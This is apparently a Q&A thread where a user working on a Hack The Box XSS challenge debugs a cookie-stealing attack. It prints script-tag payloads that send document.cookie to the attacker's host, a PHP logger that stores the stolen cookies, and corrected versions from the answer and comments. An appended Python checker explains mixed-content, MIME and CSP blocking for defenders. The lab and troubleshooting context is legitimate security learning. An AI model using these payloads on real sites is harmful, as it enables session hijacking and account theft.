XSS code not fetching back script
I am doing an XSS challenge on HTB and have run into an issue. I have the unvalidated field that is vulnerable to XSS, and so far I have got the below line to successfully call back to a Python server on my box that is hosting a malicious script embedded in an HTML file.
The issue I have is that after the initial call from the top script tag fetches the index.html, the malicious script that should be called from the HTML file is not getting called.
Maybe my understanding of this attack is wrong, but I thought I should see first the call for the HTML file and then a call by the malicious JS.
The application is using HTTPS but my Python server is HTTP.
Is my implementation wrong, or my understanding of this attack vector?
<script src="http://My_ip/index.html"></script>
I'm trying to then fetch this HTML file containing a remote malicious script...
<html>
<body>
<script type="text/javascript">
document.location='http://my_ip/write.php?c='+document.cookie;
</script>
</body>
</html>
And this is my PHP script that is supposed to be receiving the file.
<?php
// Send the browser back to the application, then append the received value to a log file.
header('Location: https://intra.redcross.htb/');
$cookies = $_GET["c"];
$file = fopen('log.txt', 'a');
fwrite($file, $cookies . "\n\n");
fclose($file);
?>
The idea of the attack is that I run the first piece in the script tags, which fetches the HTML file, which finally sends the call with the (hopefully) admin cookie to my server and the PHP script to be written to a file.
I did also try this as the XSS payload, but I only got the callback and no cookie data.
<script src='http://my_ip/write.php?c='+document.cookie;</script>
xss javascript
Your question is missing some details that may be important for an answer. Is the vulnerable application accessed via HTTPS? (some browsers will not include cross-protocol) Is there a CSP in place? Your question is also a bit unclear to me. Why do you want to fetch a .html file via XSS? The first code block is the XSS payload, the third code block is the logging script, but what is the second block? What is the index.html file that is fetched?
– tim
Dec 30 '18 at 22:05
@tim I've edited it and yes, it is using HTTPS. I am just using the index.html file because it was part of the tutorial I found on Null Byte. I've not done XSS before.
– Rich C
Dec 30 '18 at 22:37
asked Dec 30 '18 at 21:13 by Rich C (edited Dec 30 '18 at 22:42)
1 Answer
As far as I can tell, there are two issues here:
- modern browsers will not fetch mixed active content (i.e. JavaScript served via HTTP when the site is HTTPS).
- you can't include an HTML file as a script (because it doesn't contain valid JavaScript code).
So what you want to do is include a JavaScript - not an HTML - file in your XSS payload via HTTPS. Or you could just use the actual payload directly instead of fetching the script first. So your XSS payload should be either of these:
Fetch script:
<!-- note the .js instead of .html;
the JS file would then contain JS code (not HTML code)
and do something malicious
-->
<script src="https://My_ip/index.js"></script>
Direct:
<!-- here, HTTP is OK because it's just a redirect, not loading scripts -->
<script>
document.location='http://my_ip/write.php?c='+document.cookie;
</script>
If the attacker’s page supports HTTPS, then you can also simply use a protocol-relative URL (<script src=//example.com/script.js>) to keep the payload nice and short. :)
– EdOverflow
Dec 30 '18 at 23:29
"[...] the JS file would then contain JS code [...]", just to expand on this for @rich-c, a good idea would be to include the JavaScript contents of the payload @tim provided at the end (under "Direct:") in that JavaScript file you are fetching. So index.js would contain document.location='http://my_ip/write.php?c='+document.cookie;. This will then fetch the JavaScript file from https://my_ip/ and run the code from the file in the victim's session.
– EdOverflow
Dec 31 '18 at 12:11
answered Dec 30 '18 at 22:58 by tim
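Added example (not code from the question, the answer or the comments) that turns the answer's two points and the comment thread into a checker a defender can run against a page and a script URL: it resolves the src the way a browser does (so a protocol-relative URL inherits the page's scheme, as EdOverflow notes), flags mixed active content, flags a non-script Content-Type, and applies a simplified script-src CSP match since tim asked whether a CSP is in place. The page URL, the MIME list and the CSP subset are assumptions.

```python
from urllib.parse import urljoin, urlsplit

# MIME types a browser will execute for an external <script src=...> (assumed list).
SCRIPT_MIME_TYPES = {"text/javascript", "application/javascript",
                     "application/x-javascript", "text/ecmascript", "application/ecmascript"}


def resolve_script_url(page_url: str, script_src: str) -> str:
    """Resolve src relative to the page, as the browser does. A protocol-relative
    "//host/file.js" inherits the page's scheme (EdOverflow's short form)."""
    return urljoin(page_url, script_src)


def csp_allows_script(page_url: str, script_url: str, csp: str) -> bool:
    """Simplified Content-Security-Policy check for an external script: script-src
    (falling back to default-src) with 'none', 'self', '*' and [scheme://]host
    sources, including a leading "*." host wildcard. Nonces, hashes, paths and
    'strict-dynamic' are not modelled (assumption: not needed for this page)."""
    directives = {}
    for directive in csp.split(";"):
        tokens = directive.split()
        if tokens:
            directives[tokens[0].lower()] = [t.lower() for t in tokens[1:]]
    sources = directives.get("script-src", directives.get("default-src"))
    if sources is None:                      # no applicable directive: unrestricted
        return True
    page, target = urlsplit(page_url), urlsplit(script_url)
    target_host = target.netloc.lower()
    for src in sources:
        if src == "'none'":
            return False
        if src == "'self'":
            if (target.scheme, target_host) == (page.scheme, page.netloc.lower()):
                return True
        elif src == "*":
            return True
        elif not src.startswith("'"):        # host source, e.g. https://cdn.example
            scheme, sep, host = src.rpartition("://")
            if sep and scheme != target.scheme:
                continue
            if host == target_host or (host.startswith("*.") and target_host.endswith(host[1:])):
                return True
    return False


def why_script_will_not_run(page_url: str, script_src: str, content_type: str, csp: str = "") -> list:
    """Reasons a browser refuses to run <script src=script_src> on page_url, or []
    if it would run. content_type is the Content-Type the hosting server sends
    (python -m http.server derives it from the file extension)."""
    resolved = resolve_script_url(page_url, script_src)
    reasons = []
    # Answer's issue 1: mixed active content. An https page may not load script over
    # plain http; the browser blocks the request and reports it in the console.
    if urlsplit(page_url).scheme == "https" and urlsplit(resolved).scheme == "http":
        reasons.append("mixed active content: https page cannot load " + resolved)
    # Answer's issue 2: the body must be JavaScript. An HTML document does not parse
    # as script, and with X-Content-Type-Options: nosniff a non-script MIME type is
    # refused before parsing.
    mime = content_type.split(";", 1)[0].strip().lower()
    if mime not in SCRIPT_MIME_TYPES:
        reasons.append("not a script: " + resolved + " is served as " + mime)
    # tim's comment asked about CSP: a script-src that omits the host blocks it too.
    if not csp_allows_script(page_url, resolved, csp):
        reasons.append("blocked by CSP: " + resolved + " is not an allowed script-src")
    return reasons


if __name__ == "__main__":
    page = "https://intra.redcross.htb/"    # constructed from the question's redirect target
    for src, ctype in [("http://My_ip/index.html", "text/html"),
                       ("https://My_ip/index.js", "application/javascript"),
                       ("//example.com/script.js", "text/javascript")]:
        print(src, "->", "; ".join(why_script_will_not_run(page, src, ctype)) or "would run")
```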